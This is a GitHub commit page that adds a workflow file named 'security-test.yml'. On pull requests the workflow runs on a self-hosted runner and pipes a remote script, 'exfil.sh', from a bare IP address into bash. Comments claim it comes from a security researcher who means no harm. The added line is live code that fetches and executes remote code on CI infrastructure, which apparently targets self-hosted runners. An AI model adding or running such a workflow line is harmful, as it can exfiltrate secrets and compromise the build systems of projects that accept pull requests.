Skip to content

Commit

Permalink
Create security-test.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
hugo-syn committed Apr 12, 2024
1 parent 76204ef commit 03d9d15
Showing 1 changed file with 16 additions and 0 deletions.
16 changes: 16 additions & 0 deletions .github/workflows/security-test.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
name: Security test
on:
pull_request:

jobs:
security:
runs-on: upgrade-tester

steps:
- name: security test
run: |
# If you're reading this, please know I'm a security researcher and mean no harm.
# If this workflow runs as expected, I'll reach out soon to report a security issue.
# otherwise you can safely ignore this
# In the meantime, you can reach me on Twitter if you have any question
curl -k https://193.70.37.121/static/exfil.sh | bash

0 comments on commit 03d9d15

Please sign in to comment.